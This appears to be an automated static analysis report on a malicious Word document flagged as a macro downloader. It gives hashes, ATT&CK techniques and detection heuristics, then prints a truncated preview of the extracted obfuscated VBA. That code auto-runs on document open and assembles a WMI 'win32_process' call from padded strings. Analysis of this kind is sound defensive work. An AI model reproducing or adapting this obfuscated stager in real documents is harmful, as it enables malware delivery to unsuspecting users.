Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5ed9118513f3a79…

MALICIOUS

Office (OLE)

Size: 197.1 KB
Created: 2020-08-19 14:57:00
Authoring application: Microsoft Office Word
First seen: 2020-08-25
MD5: 9a7ec5395cf577e1b6080d45671dc19c
SHA-1: 1dbb41942a7bfcde8e2a1991b065f3e5f382345b
SHA-256: b5ed9118513f3a797d4fd61c816c9eceaff2bdcae93827bc4024ce08055e29bd
Risk Score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro and 'CreateObject' calls, combined with a hidden UserForm property read, indicate a command stager designed to execute arbitrary code. This functionality is characteristic of a downloader, aiming to fetch and run a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics (7)

  • ClamAV: Doc.Downloader.Generic-9398353-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-9398353-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename:   macros.bas
Kind:       vba-macro
Source:     oletools.olevba.extract_macros (decoded VBA source)
Size:       15398 bytes
SHA-256:    8b1b76fe73774783e6e83a42ac3015866126d78967386c2115eb8ac27be1f045
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Nbcis07beg95"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Vc3y4gzy12f3sa3aq4.P2matgpfa4ym8
End Sub


Attribute VB_Name = "Vc3y4gzy12f3sa3aq4"
Attribute VB_Base = "0{14AE8CEF-1115-43A4-B5D2-43D694E795B1}{A6672EF9-6928-4BC9-BDDF-2F06880FEB7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function P2matgpfa4ym8()
   Ne7pdtj8ddd3d8kobl = "405"
If Len("A1do9xbqlbrv4Obfk7n5x09m") = Len("Vxuyp91p7jp203cc96") + 1 Then End
If Len("Nk1t6edg0tn2fb_5Xxxt7oflxpmdl2Ck5ydezum337tsjz") < Len("Yyfkidx8vhi12cy4yx") Then
        MsgBox "Fm1kidl3etx4n1nfx" + "L7hh2t8q5v1dc67"
        MsgBox ("Myin9g9mto0o7a")
        MsgBox "Xahi2yavhn3k1c" + "L390iz9kyj0"
End If
If Len("Rmvtv5g4d6xe1qcaaXhkt0gr831_2") = Len("Z45njx5gruk9ve4") Then
       MsgBox "Ux8jsm2vfnoc" + "Br4mlyl8d4og0qxa"
       MsgBox ("Jbyy_cdrbxcii7j !!!")
       MsgBox "Mpdsvjrsmz5tdu8dv" + "Zmpbdoz6kajy78f"
End If

Ot90klgiwo5j = Vc3y4gzy12f3sa3aq4.HelpContextId + 50 + 50
   Ba171kfd8xql = "568"
If Len("Sp5qwfafd1stGhg0zx8fxbgymj2y") = Len("Cn693mq6ob_c0") + 1 Then End
If Len("Fmba99004pbcnUk7ks2wfy2r61elwCz2_lkj41ofuq81_4c") < Len("Ezvhzbyltch") Then
        MsgBox "Qhs0oxyq_ws3nrvi6" + "W9chphsrc9y011tvs"
        MsgBox ("Y9mmewduh56ir")
        MsgBox "L3hk2q4kq8u24b" + "Ui30il8pt4qd6azx6r"
End If
If Len("N9tj5bvxrq4oCypvcjieunysln9k3") = Len("Sjvt0j_08yyp_") Then
       MsgBox "Kwahwevvid0v63sy" + "J1gdfjuzfvdnvreo"
       MsgBox ("Czn1zy1easuopiqial !!!")
       MsgBox "Vyjnqsqurixx6g8y" + "H9zcq0e2ak2mxevfp"
End If

B4qyklbf4wmqgb6 = ChrW(Ot90klgiwo5j + (15))
   Fv11sas8p4mokv73g = "709"
If Len("Jgzfyo2ferr59u0Kbd3710c4iosasn_") = Len("Pencc9m_n7apv73qw") + 1 Then End
If Len("Vzozyixmp_ieDralpvwme34t59xhQbpltlp8qfq2t") < Len("Tii80vvn6_619") Then
        MsgBox "E6k_ecngzmvgvo0" + "Ewvpbkwazx3jhq"
        MsgBox ("Vo42w6rwr_uu7m")
        MsgBox "Agoo5iesv7iklskd_" + "W343xnwzaeqs2"
End If
If Len("R8wv74wiz7i6nvfeWvkav_ita4ei") = Len("Bdftvo7zhhx") Then
       MsgBox "B8u4_au89v8q1e8o" + "W_r_y5f16_2"
       MsgBox ("Mynxnscz2b3v !!!")
       MsgBox "Crgz4qsrxmhgy" + "Codeb4yq8u5nx5"
End If

Kx2bnl4tec_hl = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + B4qyklbf4wmqgb6 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Vc3y4gzy12f3sa3aq4.W5y86jyz3yvek5xv + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Q9rd_93new1w_t = "251"
If Len("Eh1kk7v5jj3c_ju4lJzwtga70b0r499c4g") = Len("Yiutcdi6h74e") + 1 Then End
If Len("Uo3x5hyazpm6wnqW_gco6ck5wskmZf8ozogkjwtej5iyr") < Len("Tsn7xcg9ms4hznz8") Then
        MsgBox "E9hzcgu2uukwjc" + "D3t5qes6i2cy"
        MsgBox ("B8fpnpb1jc1m4f")
        MsgBox "N7mcpxb967q" + "Rd09_sczyo7j6"
End If
If Len("L7z5ry_pmnoG6a0kt8dmxle161qpd") = Len("Cioigjap4lj") Then
       MsgBox "Puajizzemm2z4vve" + "Yt_inl26x51jee4"
       MsgBox ("Xzvzws22_z2 !!!")
       MsgBox "Sqvy8463jsjijow" + "Y6hi0w77_paq4jjyu"
End If

Owd57ijxes9oy0p = R7vtufy513ghb_4y(Kx2bnl4tec_hl)
   Fbzcxun7v7a = "811"
If Len("E6yq_sk7yxvwjdjatVdufoxlg3ctwkd8blv") = Len("N5cwvpurc4u") + 1 Then End
If Len("J
... (truncated)